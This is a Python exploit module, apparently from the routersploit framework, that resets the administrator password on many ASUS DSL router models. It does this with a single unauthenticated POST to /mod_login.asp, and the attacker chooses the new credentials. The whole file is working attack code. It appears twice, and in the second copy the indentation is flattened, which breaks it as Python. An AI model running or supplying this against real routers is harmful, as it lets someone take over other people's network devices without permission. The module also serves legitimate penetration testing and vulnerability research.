paralax/dsl_ac_password_reset.py

## dsl_ac_password_reset.py
import random
import string

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient

class Exploit(HTTPClient):
    __info__ = {
        "name": "ASUS Router Password Reset",
        "description": "Module exploits remote flaw in ASUS devices to reset the "
                       "admin password. If the target is vulnerable, it will be "
                       "set to the attacker's chosing.",
        "authors": (
            "@jnazario",  # routersploit module
        ),
        "references": (
            "https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
        ),
        "devices": (
            'DSL-AC51',
            'DSL-AC52U',
            'DSL-AC55U',
            'DSL-N55U C1',
            'DSL-N55U D1',
            'DSL-AC56U',
            'DSL-N10_C1',
            'DSL-N12U C1',
            'DSL-N12E C1',
            'DSL-N14U',
            'DSL-N14U-B1',
            'DSL-N16',
            'DSL-N16U',
            'DSL-N17U',
            'DSL-N66U',
            'DSL-AC750'
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Account to change")
    password = OptString("password", "New password password")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")

            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
                "Referer": self.target+"/Main_Password.asp",

            }

            data = {"group_id": "", "action_mode": "apply",
                       "current_page": "Main_Password.asp",
                       "next_page": "/index.asp", "flag": "",
                       "usernamepasswdFlag": "1",
                       "http_username": self.username,
                       "http_passwd": self.password,
                       "foilautofill": ""}
            response = self.http_request(
                method='POST',
                path='/mod_login.asp',
                headers=headers,
                data=data
                )
            if response is None:
                print_error("Exploit failed")
                return ''
            if response.status_code == 200:
                return response.text
        else:
            print_error("Target is not vulnerable")

    @mute
    def check(self):
        response = self.http_request(method='GET',
                                     path='/mod_login.asp')
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False
	import random
	import string

	from routersploit.core.exploit import *
	from routersploit.core.http.http_client import HTTPClient

	class Exploit(HTTPClient):
	__info__ = {
	"name": "ASUS Router Password Reset",
	"description": "Module exploits remote flaw in ASUS devices to reset the "
	"admin password. If the target is vulnerable, it will be "
	"set to the attacker's chosing.",
	"authors": (
	"@jnazario", # routersploit module
	),
	"references": (
	"https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
	),
	"devices": (
	'DSL-AC51',
	'DSL-AC52U',
	'DSL-AC55U',
	'DSL-N55U C1',
	'DSL-N55U D1',
	'DSL-AC56U',
	'DSL-N10_C1',
	'DSL-N12U C1',
	'DSL-N12E C1',
	'DSL-N14U',
	'DSL-N14U-B1',
	'DSL-N16',
	'DSL-N16U',
	'DSL-N17U',
	'DSL-N66U',
	'DSL-AC750'
	)
	}

	target = OptIP("", "Target IPv4 or IPv6 address")
	port = OptPort(80, "Target HTTP port")

	username = OptString("admin", "Account to change")
	password = OptString("password", "New password password")

	def run(self):
	if self.check():
	print_success("Target appears to be vulnerable")

	headers = {
	"Content-Type": "application/x-www-form-urlencoded",
	"Referer": self.target+"/Main_Password.asp",

	}

	data = {"group_id": "", "action_mode": "apply",
	"current_page": "Main_Password.asp",
	"next_page": "/index.asp", "flag": "",
	"usernamepasswdFlag": "1",
	"http_username": self.username,
	"http_passwd": self.password,
	"foilautofill": ""}
	response = self.http_request(
	method='POST',
	path='/mod_login.asp',
	headers=headers,
	data=data
	)
	if response is None:
	print_error("Exploit failed")
	return ''
	if response.status_code == 200:
	return response.text
	else:
	print_error("Target is not vulnerable")

	@mute
	def check(self):
	response = self.http_request(method='GET',
	path='/mod_login.asp')
	if response is None:
	return False
	if response.status_code == 200:
	return True
	return False